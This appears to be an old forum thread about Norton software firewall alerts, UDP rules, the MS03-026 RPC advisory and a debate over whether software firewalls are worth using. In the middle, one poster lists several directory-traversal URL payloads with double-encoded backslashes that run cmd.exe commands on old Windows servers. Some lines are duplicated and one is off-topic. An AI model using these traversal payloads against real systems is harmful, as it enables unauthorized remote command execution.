It's there but hidden under 'mostra dettagli' or 'show details' button.Where is udp in Shareholder's image?
I know this because it says "Rischio basso" which is "low risk" in English.
It's there but hidden under 'mostra dettagli' or 'show details' button.Where is udp in Shareholder's image?
I know this because it says "Rischio basso" which is "low risk" in English.
I set that pause myself.delete the first fram of the anamation it will keep spinning. Instead of stopping![]()
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
For XP would be /Rpc/..%255c..%255c..%255cwindows/system32/cmd.exe?/c+dir instead of winnt
Easy you see?
http://www.microsoft.com/technet/treeview/...in/MS03-026.asp
Best practices recommend blocking all TCP/IP ports that are not actually being used, and most firewalls including the Windows Internet Connection Firewall (ICF) block those ports by default. For this reason, most machines attached to the Internet should have RPC over TCP or UDP blocked. RPC over UDP or TCP is not intended to be used in hostile environments such as the Internet. More robust protocols such as RPC over HTTP are provided for hostile environments
Listen DL. We just let communication though for a specific type of UDP communication from a specific 'low risk' built in setting for Norton firewall.
Any other type of communication and Norton Will alert us, ok?
Maybe ok![]()
Snake oil?
Anyway I also have a hardware firewall.
Btw, Sparsely, That's a neat sig.
Edit to add: Hey I almost forgot... Welcome to the discussion board, DL.![]()
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Yeah your right, it makes you think the worst when that crap comes up.Originally posted by Sparsely@19 October 2003 - 20:12
exactly why I hate software firewalls.
snake oil is really all they are...
*OOh! look! I'm ur firewall! I'm blocking stuff! You'd be haxored without meh!*
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